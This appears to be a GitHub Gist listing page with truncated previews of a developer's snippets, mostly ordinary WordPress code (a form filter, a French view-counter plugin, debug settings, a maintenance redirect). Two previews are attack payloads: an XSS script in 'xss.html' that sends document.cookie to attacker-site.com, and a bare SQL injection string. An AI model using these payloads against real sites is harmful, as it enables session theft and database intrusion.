View functions.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Use this CF7 field [select dates_cyril], field name is "dates_cyril" | |
**/ | |
add_filter( 'wpcf7_form_tag', 'waw_dynamic_select_field_values', 10, 2); | |
function waw_dynamic_select_field_values ( $scanned_tag, $replace ) { | |
if ( $scanned_tag['name'] != 'dates_cyril' ) { |
View compteur-de-vues.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Plugin Name: Compteur de vues d'articles | |
Plugin URI: https://example.com/plugins/compteur-de-vues-darticles | |
Description: Ce plugin permet de compter les vues d'un article ou d'un custom post type. | |
Version: 1.0 | |
Author: Votre nom | |
Author URI: https://example.com | |
License: GPL-2.0+ | |
License URI: http://www.gnu.org/licenses/gpl-2.0.txt |
View wp-config.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** LOG Error **/ | |
// Enable WP_DEBUG mode | |
define( 'WP_DEBUG', true ); | |
// Enable Debug logging to the /wp-content/debug.log file | |
define( 'WP_DEBUG_LOG', true ); | |
// Disable display of errors and warnings | |
define( 'WP_DEBUG_DISPLAY', false ); |
View .htaccess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
RewriteCond %{REQUEST_URI} !^/maintenance\.html$ | |
RewriteCond %{REMOTE_ADDR} !^123\.456\.789\.000 | |
RewriteRule .* /maintenance.html [R=503,L] | |
ErrorDocument 503 /maintenance.html | |
Header Set Cache-Control "max-age=0, no-store" |
View maintenance.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="fr"> | |
<head> | |
<meta charset="UTF-8"> | |
<title>Maintenance</title> | |
</head> | |
<body> | |
<h1>Nous sommes en maintenance</h1> | |
<p>Nous effectuons actuellement des travaux sur notre site. Merci de revenir plus tard.</p> | |
</body> |
View .maintenance
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php $upgrading = time(); ?> |
View xss.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
var cookies = document.cookie; | |
var xhr = new XMLHttpRequest(); | |
xhr.open("GET", "http://www.attacker-site.com/steal.php?cookies=" + cookies, true); | |
xhr.send(); | |
</script> |
View functions.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' OR 1=1; -- |
View microformat.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div class="vcard"> | |
<h2>Nom de l'entreprise</h2> | |
<p> | |
Adresse : <span class="street-address">123 Main St</span> | |
<span class="locality">Ville</span>, | |
<span class="region">État</span> | |
<span class="postal-code">Code postal</span> | |
</p> | |
<p> | |
Téléphone : <span class="tel">(555) 555-5555</span> |
View functions.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Register the hero block | |
function register_hero_block() { | |
register_block_type('my-plugin/hero', array( | |
'render_callback' => 'render_hero_block', | |
'attributes' => array( | |
'title' => array( | |
'type' => 'string', | |
'default' => '', | |
), |
NewerOlder